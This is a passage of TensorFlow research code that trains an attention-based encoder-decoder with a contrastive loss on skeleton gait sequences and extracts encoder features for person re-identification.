training_decoder_output, predicting_decoder_output, lstm_weights_1, lstm_weights_2 = encoder_decoder(input_data,
targets,
lr,
target_sequence_length,
max_target_sequence_length,
source_sequence_length,
encoding_embedding_size,
decoding_embedding_size,
rnn_size,
num_layers)
training_decoder_output = training_decoder_output.rnn_output
predicting_output = tf.identity(predicting_decoder_output.rnn_output, name='predictions')
training_output = tf.identity(predicting_decoder_output.rnn_output, name='train_output')
# suancaiyu
train_loss = tf.reduce_mean(tf.nn.l2_loss(training_decoder_output - targets))
print("wsx log traing_loss")
print("wsx log training_decoder_output shape",training_decoder_output.shape)
print("wsx log targets shape",targets.shape)
real_loss = tf.identity(train_loss, name='real_loss')
encoder_output = train_graph.get_tensor_by_name('rnn/transpose_1:0')
if use_attention:
attention_matrices = tf.identity(attention_matrices, name='train_attention_matrix')
# Locality-oriented attention loss
if attention == 'LA' or attention == 'LA-R':
objective_attention = np.ones(shape=[time_steps, time_steps])
for index, _ in enumerate(objective_attention.tolist()):
if not Reverse:
pt = index
else:
pt = time_steps - 1 - index
D = time_steps
objective_attention[index][pt] = 1
for i in range(1, D+1):
if pt + i <= time_steps - 1:
objective_attention[index][min(pt + i, time_steps - 1)] = np.exp(-(i)**2/(2*(D/2)**2))
if pt-i >= 0:
objective_attention[index][max(pt-i, 0)] = np.exp(-(i)**2/(2*(D/2)**2))
objective_attention[index][pt] = 1
objective_attention = np.tile(objective_attention, [batch_size, 1, 1])
objective_attention = objective_attention.swapaxes(1,0)
att_loss = tf.reduce_mean(tf.nn.l2_loss(attention_matrices - attention_matrices * objective_attention))
train_loss += att_loss
if Frozen == '0':
attention_trans = tf.transpose(attention_matrices, [1, 0, 2])
AGEs = tf.matmul(attention_trans, encoder_output)
AGEs = tf.reshape(AGEs, [batch_size, -1])
first_size = rnn_size * time_steps
# C_input = tf.placeholder(tf.float32, [None, first_size], name='C_input')
C_lr = tf.Variable(0.0005, trainable=False, dtype=tf.float32, name='learning_rate')
# learning_rate_1:0
W1 = tf.Variable(tf.random_normal([first_size, rnn_size]), name='W1')
b1 = tf.Variable(tf.zeros(shape=[rnn_size, ]), name='b1')
Wx_plus_b1 = tf.matmul(AGEs, W1) + b1
l1 = tf.nn.relu(Wx_plus_b1)
W = tf.Variable(tf.random_normal([rnn_size, rnn_size]), name='W')
b = tf.Variable(tf.zeros(shape=[rnn_size, ], name='b'))
contrast_v = tf.matmul(l1, W) + b
# print (encoder_output)
# print(attention_trans)
# print(AGEs)
# print(contrast_v)
# exit(1)
# add_2:0
# with tf.name_scope("C_train"):
t = temperature
C_optimizer = tf.train.AdamOptimizer(learning_rate, name="Adam_C")
z1 = contrast_v[1:]
z2 = contrast_v[:-1]
z = tf.concat((z1, z2), axis=0)
unorm_sim = tf.matmul(z, tf.transpose(z))
z_norm = tf.sqrt(tf.reduce_sum(tf.pow(z, 2), axis=1))
z_norm = tf.expand_dims(z_norm, axis=1)
norm_matrix = tf.matmul(z_norm, tf.transpose(z_norm))
sim = unorm_sim / (t * norm_matrix)
C_loss = tf.zeros(1)
sample_num = batch_size - 1
for i in range(sample_num):
C_loss = C_loss - tf.log(
tf.exp(sim[i, i + sample_num]) / (tf.reduce_sum(tf.exp(sim[i, :])) - tf.exp(sim[i, i])))
C_loss = C_loss - tf.log(tf.exp(sim[i + sample_num, i]) / (
tf.reduce_sum(tf.exp(sim[i + sample_num, :])) - tf.exp(
sim[i + sample_num, i + sample_num])))
C_loss = C_loss / (2 * sample_num)
# C_train_op = C_optimizer.minimize(C_loss)
train_loss += C_loss
# print (C_lr, C_loss, contrast_v)
# <tf.Variable 'learning_rate_1:0' shape=() dtype=float32_ref>
# Tensor("C_train/truediv_255:0", shape=(1,), dtype=float32)
# Tensor("add_2:0", shape=(128, 256), dtype=float32)
# exit(1)
else:
h_s = tf.reshape(encoder_output, [batch_size, -1])
first_size = rnn_size * time_steps
C_lr = tf.Variable(0.0005, trainable=False, dtype=tf.float32, name='learning_rate')
W1 = tf.Variable(tf.random_normal([first_size, rnn_size]), name='W1')
b1 = tf.Variable(tf.zeros(shape=[rnn_size, ]), name='b1')
Wx_plus_b1 = tf.matmul(h_s, W1) + b1
l1 = tf.nn.relu(Wx_plus_b1)
W = tf.Variable(tf.random_normal([rnn_size, rnn_size]), name='W')
b = tf.Variable(tf.zeros(shape=[rnn_size, ], name='b'))
contrast_v = tf.matmul(l1, W) + b
t = temperature
C_optimizer = tf.train.AdamOptimizer(learning_rate, name="Adam_C")
z1 = contrast_v[1:]
z2 = contrast_v[:-1]
z = tf.concat((z1, z2), axis=0)
unorm_sim = tf.matmul(z, tf.transpose(z))
z_norm = tf.sqrt(tf.reduce_sum(tf.pow(z, 2), axis=1))
z_norm = tf.expand_dims(z_norm, axis=1)
norm_matrix = tf.matmul(z_norm, tf.transpose(z_norm))
sim = unorm_sim / (t * norm_matrix)
C_loss = tf.zeros(1)
sample_num = batch_size - 1
for i in range(sample_num):
C_loss = C_loss - tf.log(
tf.exp(sim[i, i + sample_num]) / (tf.reduce_sum(tf.exp(sim[i, :])) - tf.exp(sim[i, i])))
C_loss = C_loss - tf.log(tf.exp(sim[i + sample_num, i]) / (
tf.reduce_sum(tf.exp(sim[i + sample_num, :])) - tf.exp(
sim[i + sample_num, i + sample_num])))
C_loss = C_loss / (2 * sample_num)
train_loss += C_loss
l2 = lambda_l2_reg * sum(
tf.nn.l2_loss(tf_var)
for tf_var in tf.trainable_variables()
if not ("noreg" in tf_var.name or "Bias" in tf_var.name)
)
# train_loss += att_loss
cost = tf.add(l2, train_loss, name='cost')
with tf.name_scope("optimization"):
# Optimizer
optimizer = tf.train.AdamOptimizer(lr, name='Adam')
# Gradient Clipping
gradients = optimizer.compute_gradients(cost)
capped_gradients = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in gradients if grad is not None]
train_op = optimizer.apply_gradients(capped_gradients, name='train_op')
# Contrast learning after freezing AGEs
if Frozen == '1':
first_size = rnn_size * time_steps
C_input = tf.placeholder(tf.float32, [None, first_size], name='C_input')
lr = tf.Variable(0.0005, trainable=False, dtype=tf.float32, name='learning_rate')
# learning_rate_1:0
W1 = tf.Variable(tf.random_normal([first_size, rnn_size]), name='W1')
b1 = tf.Variable(tf.zeros(shape=[rnn_size, ]), name='b1')
Wx_plus_b1 = tf.matmul(C_input, W1) + b1
l1 = tf.nn.relu(Wx_plus_b1)
W = tf.Variable(tf.random_normal([rnn_size, rnn_size]), name='W')
b = tf.Variable(tf.zeros(shape=[rnn_size, ], name='b'))
contrast_v = tf.matmul(l1, W) + b
# add_16:0
with tf.name_scope("C_train"):
t = temperature
C_optimizer = tf.train.AdamOptimizer(learning_rate, name="Adam_C")
z1 = contrast_v[1:]
z2 = contrast_v[:-1]
# cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y_input))
# (batch_size-1, )
z = tf.concat((z1, z2), axis=0)
unorm_sim = tf.matmul(z, tf.transpose(z))
z_norm = tf.sqrt(tf.reduce_sum(tf.pow(z, 2), axis=1))
z_norm = tf.expand_dims(z_norm, axis=1)
# z_norm = z_norm.unsqueeze(1)
norm_matrix = tf.matmul(z_norm, tf.transpose(z_norm))
# norm_matrix = z_norm.mm(z_norm.t())
sim = unorm_sim / (t * norm_matrix)
# print (z, unorm_sim, z_norm, norm_matrix, sim)
# exit(1)
# sim = unorm_sim / (self.t * norm_matrix)
# # print(sim[batch_size+2, 5])
# # print(sim[5, batch_size+2])
# # exit(1)
# loss = torch.zeros(1, requires_grad=True)
C_loss = tf.zeros(1)
# loss = Variable(loss.type(Tensor))
# sample_num = z1.size(0)
sample_num = batch_size - 1
# for i in range(sample_num):
# loss = loss - torch.log(
# torch.exp(sim[i, i + sample_num]) / (torch.sum(torch.exp(sim[i, :])) - torch.exp(sim[i, i])))
# loss = loss - torch.log(torch.exp(sim[i + sample_num, i]) / (
# torch.sum(torch.exp(sim[i + sample_num, :])) - torch.exp(
# sim[i + sample_num, i + sample_num])))
for i in range(sample_num):
C_loss = C_loss - tf.log(
tf.exp(sim[i, i + sample_num]) / (tf.reduce_sum(tf.exp(sim[i, :])) - tf.exp(sim[i, i])))
C_loss = C_loss - tf.log(tf.exp(sim[i + sample_num, i]) / (
tf.reduce_sum(tf.exp(sim[i + sample_num, :])) - tf.exp(
sim[i + sample_num, i + sample_num])))
C_loss = C_loss / (2 * sample_num)
# gradients = optimizer.compute_gradients(cost)
# capped_gradients = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in gradients if grad is not None]
C_train_op = C_optimizer.minimize(C_loss)
# correct_pred = tf.equal(tf.argmax(pred, 1),tf.argmax(y_input, 1))
# accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
input_data_ = np.array(input_data_)
targets_ = np.array(targets_)
# just not permuated first
# permutation = np.random.permutation(input_data_.shape[0])
# input_data_= input_data_[permutation]
# targets_ = targets_[permutation]
train_source = input_data_
train_target = targets_
train_source = train_source.tolist()
train_target =train_target.tolist()
# input_data_ = input_data_.tolist()
# targets_ = targets_.tolist()
valid_source = train_source[:batch_size]
valid_target = train_target[:batch_size]
# print(len(train_source), len(train_target), len(valid_source), len(valid_target))
(valid_targets_batch, valid_sources_batch, valid_targets_lengths, valid_sources_lengths) = next(
get_batches(valid_target, valid_source, batch_size, source_pad_int=0, target_pad_int=0))
display_step = 50
checkpoint = "./" + folder_name + "/trained_model.ckpt"
best_checkpoint = './' + folder_name + '/best_model.ckpt'
with tf.Session(graph=train_graph, config=config) as sess:
sess.run(tf.global_variables_initializer())
print('Begin Training on Dimension [' + dim.upper() + ']')
train_loss = []
test_loss = []
c_train_loss = []
losses = [0, 0, 0]
loss_cnt = 0
conv_cnt = 0
best_val = 100000
over_flag = False
if use_attention:
alignment_history = train_graph.get_tensor_by_name('train_attention_matrix:0')
encoder_output = train_graph.get_tensor_by_name('rnn/transpose_1:0')
for epoch_i in range(1, epochs + 1):
if over_flag:
break
for batch_i, (targets_batch, sources_batch, targets_lengths, sources_lengths) in enumerate(
get_batches(train_target, train_source, batch_size, source_pad_int=0, target_pad_int=0)):
# print (sources_batch[5, 3:, :])
# print (sources_batch[6, :3, :])
# print (sources_batch[9, 3:, :])
# print (sources_batch[10, :3, :])
# exit(1)
if use_attention:
if Frozen == '0':
_, loss, c_loss, att, en_outputs, att_history = sess.run(
[train_op, real_loss, C_loss, attention_matrices, encoder_output, alignment_history],
{input_data: sources_batch,
targets: targets_batch,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: targets_lengths,
source_sequence_length: sources_lengths,
keep_prob: 0.5})
else:
_, loss, att, en_outputs, att_history = sess.run([train_op, real_loss, attention_matrices, encoder_output, alignment_history],
{input_data: sources_batch,
targets: targets_batch,
lr: learning_rate,
target_sequence_length: targets_lengths,
source_sequence_length: sources_lengths,
keep_prob: 0.5})
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
# if manner == 'sc':
att_op = np.reshape(att_op, [-1]).tolist()
att_batch.append(att_op)
att_batch = np.array(att_batch)
_, c_loss, c_vec = sess.run([C_train_op, C_loss, contrast_v],
{C_input: att_batch,
lr: learning_rate
})
# print(c_loss)
# else:
# X.extend(att_op.tolist())
else:
_, loss = sess.run([train_op, real_loss],
{input_data: sources_batch,
targets: targets_batch,
lr: learning_rate,
target_sequence_length: targets_lengths,
source_sequence_length: sources_lengths,
keep_prob: 0.5})
# if batch_i % display_step == 0:
if epoch_i % 1 == 0:
if Frozen == '0':
validation_loss, c_loss = sess.run(
[real_loss, C_loss],
{input_data: valid_sources_batch,
targets: valid_targets_batch,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: valid_targets_lengths,
source_sequence_length: valid_sources_lengths,
keep_prob: 1.0})
else:
validation_loss = sess.run(
[real_loss],
{input_data: valid_sources_batch,
targets: valid_targets_batch,
lr: learning_rate,
target_sequence_length: valid_targets_lengths,
source_sequence_length: valid_sources_lengths,
keep_prob: 1.0})
# if epoch_i % 25 == 0 and validation_loss[0] < best_val:
# saver = tf.train.Saver()
# saver.save(sess, best_checkpoint)
# print('The Best Model Saved Again')
# best_val = validation_loss[0]
train_loss.append(loss)
if Frozen == '1':
c_train_loss.append(c_loss[0])
test_loss.append(validation_loss[0])
losses[loss_cnt % 3] = validation_loss[0]
print(
'Epoch {:>3}/{} Batch {:>4}/{} - Training Loss: {:>6.3f} - Validation loss: {:>6.3f} - Contrastive loss: {:>6.3f}'
.format(epoch_i,
epochs,
batch_i,
len(train_source) // batch_size,
loss,
validation_loss[0],
c_loss[0]))
else:
c_train_loss.append(c_loss[0])
test_loss.append(validation_loss)
losses[loss_cnt % 3] = validation_loss
print(
'Epoch {:>3}/{} Batch {:>4}/{} - Training Loss: {:>6.3f} - Validation loss: {:>6.3f} - Contrastive loss: {:>6.3f}'
.format(epoch_i,
epochs,
batch_i,
len(train_source) // batch_size,
loss,
validation_loss,
c_loss[0]))
loss_cnt += 1
# print(losses)
if conv_cnt > 0 and validation_loss[0] >= max(losses):
over_flag = True
break
if (round(losses[(loss_cnt - 1) % 3], 5) == round(losses[loss_cnt % 3], 5)) and (round(losses[(loss_cnt - 2) % 3], 5)\
== round(losses[loss_cnt % 3], 5)) :
sess.run(lr_decay_op)
conv_cnt += 1
saver = tf.train.Saver()
saver.save(sess, checkpoint)
print('Model Trained and Saved')
np.save(folder_name + '/train_loss.npy', np.array(train_loss))
np.save(folder_name + '/test_loss.npy', np.array(test_loss))
np.save(folder_name + '/c_train_loss.npy', np.array(c_train_loss))
def encoder_classify(model_name, dimension, type, dataset):
global manner, transfer
number = ord(dimension) - ord('x') + 1
print('Run the gait encoding model to obtain CAGEs (%d / 3)' % number)
global epochs, series_length, attention, Frozen, C_reid, view
epochs = 200
if view != '':
view_dir = view + '/'
else:
view_dir = ''
_input_data = np.load('Datasets/' + frames_ps + view_dir + dataset + '_train_npy_data/source_' + dimension + '_'+ dataset + '_'+str(time_steps)+'.npy')
_input_data = _input_data.reshape([-1, time_steps, series_length])
if Model == 'rev_rec' or Model == 'rev_rec_plus':
_targets = np.load('Datasets/'+ frames_ps + view_dir + dataset + '_train_npy_data/target_' + dimension + '_' + dataset + '_'+str(time_steps)+'.npy')
_targets = _targets.reshape([-1, time_steps, series_length])
# prediction
elif Model == 'prediction':
_targets = np.concatenate((_input_data[1:, :, :], _input_data[-1, :, :].reshape([1, time_steps, series_length])),
axis=0)
# _input_data = _input_data[:-1]
# permutation
elif Model == 'sorting':
_targets = copy.deepcopy(_input_data)
for i in range(_input_data.shape[0]):
permutation_ = np.random.permutation(time_steps)
_input_data[i] = _input_data[i, permutation_]
if dataset == 'IAS':
t_input_data = np.load(
'Datasets/' + frames_ps + dataset + '_test_npy_data/t_source_' + dimension + '_' + dataset + '-A_' + str(
time_steps) + '.npy')
t_input_data = t_input_data.reshape([-1, time_steps, series_length])
if Model == 'rev_rec' or Model == 'rev_rec_plus':
t_targets = np.load(
'Datasets/' + frames_ps + dataset + '_test_npy_data/t_target_' + dimension + '_' + dataset + '-A_' + str(
time_steps) + '.npy')
t_targets = t_targets.reshape([-1, time_steps, series_length])
elif Model == 'prediction':
t_targets = np.concatenate(
(t_input_data[1:, :, :], t_input_data[-1, :, :].reshape([1, time_steps, series_length])), axis=0)
# t_input_data = t_input_data[:-1]
# permutation
elif Model == 'sorting':
t_targets = copy.deepcopy(t_input_data)
for i in range(t_input_data.shape[0]):
permutation_ = np.random.permutation(time_steps)
t_input_data[i] = t_input_data[i, permutation_]
t_2_input_data = np.load(
'Datasets/' + frames_ps + dataset + '_test_npy_data/t_source_' + dimension + '_' + dataset + '-B_' + str(
time_steps) + '.npy')
t_2_input_data = t_2_input_data.reshape([-1, time_steps, series_length])
if Model == 'rev_rec' or Model == 'rev_rec_plus':
t_2_targets = np.load(
'Datasets/' + frames_ps + dataset + '_test_npy_data/t_target_' + dimension + '_' + dataset + '-B_' + str(
time_steps) + '.npy')
t_2_targets = t_2_targets.reshape([-1, time_steps, series_length])
elif Model == 'prediction':
t_2_targets = np.concatenate(
(t_2_input_data[1:, :, :], t_2_input_data[-1, :, :].reshape([1, time_steps, series_length])), axis=0)
# t_2_input_data = t_2_input_data[:-1]
# permutation
elif Model == 'sorting':
t_2_targets = copy.deepcopy(t_2_input_data)
for i in range(t_2_input_data.shape[0]):
permutation_ = np.random.permutation(time_steps)
t_2_input_data[i] = t_2_input_data[i, permutation_]
else:
t_input_data = np.load('Datasets/' + frames_ps + view_dir + dataset + '_test_npy_data/t_source_' + dimension + '_' + dataset + '_'+str(time_steps)+'.npy')
t_input_data = t_input_data.reshape([-1, time_steps, series_length])
if Model == 'rev_rec' or Model == 'rev_rec_plus':
t_targets = np.load('Datasets/' + frames_ps + view_dir + dataset + '_test_npy_data/t_target_' + dimension + '_' + dataset + '_'+str(time_steps)+'.npy')
t_targets = t_targets.reshape([-1, time_steps, series_length])
elif Model == 'prediction':
t_targets = np.concatenate(
(t_input_data[1:, :, :], t_input_data[-1, :, :].reshape([1, time_steps, series_length])), axis=0)
# t_input_data = t_input_data[:-1]
# permutation
elif Model == 'sorting':
t_targets = copy.deepcopy(t_input_data)
for i in range(t_input_data.shape[0]):
permutation_ = np.random.permutation(time_steps)
t_input_data[i] = t_input_data[i, permutation_]
ids = np.load('Datasets/' + frames_ps + view_dir + dataset + '_train_npy_data/ids_' + dataset +'_'+str(time_steps)+'.npy')
# print(ids)
# exit(0)
ids = ids.item()
if not Reverse:
_targets = copy.deepcopy(_input_data)
t_targets = copy.deepcopy(t_input_data)
if dataset == 'IAS':
t_2_targets = copy.deepcopy(t_2_input_data)
# print(ids)
if dataset == 'IAS':
t_ids = np.load('Datasets/' + frames_ps + dataset + '_test_npy_data/ids_' + dataset + '-A_'+str(time_steps)+'.npy')
t_ids = t_ids.item()
t_2_ids = np.load('Datasets/' + frames_ps + dataset + '_test_npy_data/ids_' + dataset + '-B_'+str(time_steps)+'.npy')
t_2_ids = t_2_ids.item()
else:
t_ids = np.load('Datasets/' + frames_ps + view_dir + dataset + '_test_npy_data/ids_' + dataset + '_'+str(time_steps)+'.npy')
t_ids = t_ids.item()
# print(t_ids)
if transfer == 'None':
if Model == 'rev_rec_plus':
# modify: using LA for the proposed reconstruction
checkpoint = 'Models/Gait_Encoding_models/' + dataset + '_' + 'LA' + '_' + dimension + '_' + str(time_steps) \
+ '_' + str(temperature) + '_' + str(Frozen) + view + 'pre_rev_rec' + "/trained_model.ckpt"
checkpoint_1 = 'Models/Gait_Encoding_models/' + dataset + '_' + attention + '_' + dimension + '_' + str(
time_steps) \
+ '_' + str(temperature) + '_' + str(Frozen) + view + 'pre_prediction' + "/trained_model.ckpt"
checkpoint_2 = 'Models/Gait_Encoding_models/' + dataset + '_' + attention + '_' + dimension + '_' + str(
time_steps) \
+ '_' + str(temperature) + '_' + str(Frozen) + view + 'pre_sorting' + "/trained_model.ckpt"
else:
checkpoint = 'Models/Gait_Encoding_models/' + dataset + '_' + attention + '_' + dimension + '_' + str(
time_steps) \
+ '_' + str(temperature) + '_' + str(
Frozen) + view + 'pre_' + pre_task + "/trained_model.ckpt"
# print(checkpoint)
# print(checkpoint_1)
# print(checkpoint_2)
# exit(1)
else:
checkpoint = 'Models/Gait_Encoding_models/' + transfer + '_' + attention + '_' + dimension + '_' + str(
time_steps) \
+ '_' + str(temperature) + '_' + str(Frozen) + view + "/trained_model.ckpt"
if Model != 'rev_rec_plus':
loaded_graph = tf.Graph()
with tf.Session(graph=loaded_graph, config=config) as sess:
loader = tf.train.import_meta_graph(checkpoint + '.meta')
loader.restore(sess, checkpoint)
input_data = loaded_graph.get_tensor_by_name('inputs:0')
targets = loaded_graph.get_tensor_by_name('targets:0')
if Frozen == '1':
contrast_v = loaded_graph.get_tensor_by_name('add_16:0')
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
C_input = loaded_graph.get_tensor_by_name('C_inptuiut:0')
else:
contrast_v = loaded_graph.get_tensor_by_name("add_2:0")
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
if Bi_LSTM:
encoder_output = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_6:0')
encoder_output_bw = loaded_graph.get_tensor_by_name('ReverseSequence: 0')
encoder_c_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_3:0')
encoder_h_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_4:0')
encoder_c_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_5:0')
encoder_h_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
else:
encoder_output = loaded_graph.get_tensor_by_name('rnn/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('rnn/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('rnn/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
# train_output = loaded_graph.get_tensor_by_name('train_output:0')
if use_attention:
alignment_history = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
# train_attention_matrix = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
attention_state = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_12:0')
attention_weights = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_8:0')
alignment = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_10:0')
lr = loaded_graph.get_tensor_by_name('learning_rate:0')
keep_prob = loaded_graph.get_tensor_by_name('keep_prob:0')
source_sequence_length = loaded_graph.get_tensor_by_name('source_sequence_length:0')
target_sequence_length = loaded_graph.get_tensor_by_name('target_sequence_length:0')
X = []
C_X = []
X_all_op = []
X_final_op = []
X_final_c = []
X_final_h = []
X_final_c1 = []
X_final_h1 = []
X_final_ch = []
X_final_ch1 = []
y = []
C_y = []
X_pred = []
t_X = []
t_C_X = []
t_y = []
t_C_y = []
t_2_X = []
t_2_C_X = []
t_2_y = []
t_2_C_y = []
t_X_pred = []
t_X_att = []
# print(t_ids)
# print(test_attention)
ids_ = sorted(ids.items(), key=lambda item: item[0])
t_ids_ = sorted(t_ids.items(), key=lambda item: item[0])
if dataset == 'IAS':
t_2_ids_ = sorted(t_2_ids.items(), key=lambda item: item[0])
# print(ids_)
# exit(1)
for k, v in ids_:
if len(v) == 0:
print(k)
continue
if len(v) < batch_size:
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = _input_data[v[batch_i * batch_size: (batch_i + 1) * batch_size]]
this_targets = _targets[v[batch_i * batch_size: (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'c':
X.append(t2)
elif type == 'ch':
t3.extend(t2)
X.append(t3)
elif type == 'o':
X.append(t1)
elif type == 'oc':
t1.extend(t2)
X.append(t1)
elif type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
X.append(att_op)
else:
att_batch.append(att_op)
else:
X.extend(att_op.tolist())
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o + f_o_bw
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
X.append(f_o)
else:
X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
y.extend([k] * batch_size)
# C_y.extend([k] * batch_size)
else:
y.extend([k] * batch_size * time_steps)
# exit(1)
for k, v in t_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_input_data[v[batch_i * batch_size: (batch_i + 1) * batch_size]]
this_targets = t_targets[v[batch_i * batch_size: (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_X.append(att_op)
else:
att_batch.append(att_op)
else:
t_X.extend(att_op.tolist())
t_X_att.append(weights)
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_X.append(f_o)
else:
t_X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
